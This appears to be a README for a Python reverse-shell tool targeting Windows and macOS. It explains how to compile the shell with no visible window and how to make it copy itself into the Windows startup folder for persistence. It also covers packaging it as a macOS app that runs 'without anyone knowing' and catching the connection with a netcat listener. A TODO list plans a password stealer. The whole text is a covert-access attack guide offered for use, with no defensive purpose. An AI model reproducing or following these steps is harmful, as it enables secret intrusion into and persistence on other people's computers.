Reverse shell for Mac and Windows It works in both python2 and python3
TODO: Create a password stealer, Create file downloader, Maybe create server side
Change the ip-address and port to yours
To compile the .py file use Pyinstaller and the following command:
pyinstaller --onefile --windowed
it is important that you dont rename the file, because when its executed it will move itself to the startup folder and be renamed to windows_shell.exe
--onefile: to make it compile into 1 file --windowed: to run it without a cmd window
It will compile to a Dist folder
To gain access use netcat with the following command:
nc -l yourport
This listens for the port you gave it
change the ip and port to yours
for OSX you need to make it a .app package. For that use "appify" to make it a bundle
appify "you app name"
After that you need to rename the Shell to "" and drag into now when you double-click it will copy shell into downloads, and run it as a subprocess without anyone knowing
To gain access use netcat with the following command:
nc -l yourport
This listens for the port you gave it
Only works for the Danish keyboard, but it should'nt take more than a couple of minutes to make it compatible with your keyboard
put your file onto an apache/ngninx server